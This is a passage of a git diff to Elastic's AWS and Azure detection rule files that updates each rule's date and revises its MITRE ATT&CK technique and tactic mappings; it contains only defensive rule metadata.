ATT&CK" @@ -166,7 +172,6 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml index 7fefa1edaae..c54f9538c96 100644 --- a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml +++ b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -127,34 +127,47 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1584" name = "Compromise Infrastructure" reference = "https://attack.mitre.org/techniques/T1584/" + [[rule.threat.technique.subtechnique]] id = "T1584.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1584/001/" - - [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml index 6a09be1c590..83355ae7d6e 100644 --- a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml +++ b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Austin Songer", "Elastic"] @@ -125,34 +125,47 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1583" name = "Acquire Infrastructure" reference = "https://attack.mitre.org/techniques/T1583/" + [[rule.threat.technique.subtechnique]] id = "T1583.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1583/001/" - - [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_table_created.toml b/rules/integrations/aws/persistence_route_table_created.toml index fe48343e5ba..a03d91f91b8 100644 --- a/rules/integrations/aws/persistence_route_table_created.toml +++ b/rules/integrations/aws/persistence_route_table_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -111,6 +111,23 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml index 1ada122b033..8a4189fc1cd 100644 --- a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml +++ b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/10" integration = ["aws"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,39 +121,54 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.003" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1136/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml index fefefd67732..393e9186804 100644 --- a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml +++ b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/25" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] @@ -106,49 +106,72 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.new_terms] field = "new_terms_fields" value = ["user.id", "aws.cloudtrail.flattened.request_parameters.serialNumber"] diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml index 7a16cf870c9..2d378e9d56b 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,39 +121,21 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml index 87734bebf8d..c3021be1173 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,39 +119,21 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml index f694877d86f..3f13e220c2a 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,39 +123,21 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml index 628f3841116..84d8b807eca 100644 --- a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/22" +updated_date = "2026/03/24" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" @@ -100,22 +100,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.005" name = "Temporary Elevated Cloud Access" reference = "https://attack.mitre.org/techniques/T1548/005/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml index 4b9ab1316e7..924fb079451 100644 --- a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml +++ b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/22" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -125,22 +125,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml index bc91f308bb7..c8929a7f3ec 100644 --- a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml +++ b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["aws"] maturity = "production" -updated_date = "2026/01/22" +updated_date = "2026/03/24" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" @@ -97,22 +97,49 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml index c65c86306e6..213f759f65f 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2025/12/16" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -109,34 +109,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.005" +name = "Temporary Elevated Cloud Access" +reference = "https://attack.mitre.org/techniques/T1548/005/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml index 0abf5a097d8..43e24f0bc86 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,34 +95,62 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml index 49cbe18daaf..8a9c66dfc46 100644 --- a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml +++ b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/24" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -161,39 +161,67 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.005" name = "Temporary Elevated Cloud Access" reference = "https://attack.mitre.org/techniques/T1548/005/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml index 6e489d34aec..da6188b1d81 100644 --- a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml +++ b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/23" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -134,41 +134,62 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml index aa6c1fdbe9e..9fe428e0fc0 100644 --- a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml +++ b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["azure"] maturity = "production" -updated_date = "2026/02/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,17 +119,17 @@ event.dataset:azure.signinlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" @@ -137,17 +137,44 @@ reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.app_id", "azure.signinlogs.properties.tenant_id"] diff --git a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml index 3f48cab4cf9..7ec1a3dc5ad 100644 --- a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml +++ b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/06" integration = ["azure"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,17 +101,39 @@ event.dataset:azure.graphactivitylogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" +[[rule.threat.technique.subtechnique]] +id = "T1114.002" +name = "Remote Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml index a94c27b574e..319b38ece98 100644 --- a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml +++ b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/02" integration = ["azure"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,30 +110,41 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = 